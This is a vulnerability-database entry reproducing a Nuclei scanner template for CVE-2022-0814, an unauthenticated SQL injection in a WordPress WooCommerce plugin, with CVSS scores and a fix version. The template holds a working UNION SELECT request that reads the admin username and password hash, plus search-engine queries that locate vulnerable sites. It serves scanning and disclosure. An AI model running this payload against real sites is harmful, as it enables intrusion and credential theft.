Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0814
HistoryOct 17, 2023 - 7:20 a.m.

Ubigeo de Peru < 3.6.4 - SQL Injection

2023-10-1707:20:28
ProjectDiscovery
github.com
3
ubigeo de peru ubigeo de peru para woocommerce project wordpress sqli cvss wpscan wp-plugin unauth ajax actions critical vulnerability

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.04

Percentile

92.1%

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
id: CVE-2022-0814

info:
  name: Ubigeo de Peru < 3.6.4 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
  remediation: Fixed in version 3.6.4
  reference:
    - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
    - https://wordpress.org/plugins/ubigeo-peru/
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0814
    cwe-id: CWE-89
    epss-score: 0.03633
    epss-percentile: 0.91467
    cpe: cpe:2.3:a:ubigeo_de_peru_para_woocommerce_project:ubigeo_de_peru_para_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ubigeo_de_peru_para_woocommerce_project
    product: ubigeo_de_peru_para_woocommerce
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/ubigeo-peru/
    fofa-query: body=/wp-content/plugins/ubigeo-peru/
    publicwww-query: "/wp-content/plugins/ubigeo-peru/"
  tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users#

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'idProv'
          - 'idDist'
          - 'distrito'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fb4ec31b608894f19fb2aca3539cb2003d1a72b6544dee65be1c8ef8a221d3c3022026e6ea554b2da10a70b38e5a467406a45e593c8c05d8e95855ba2c9bca7886b5:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.7

Confidence

High

EPSS

0.04

Percentile

92.1%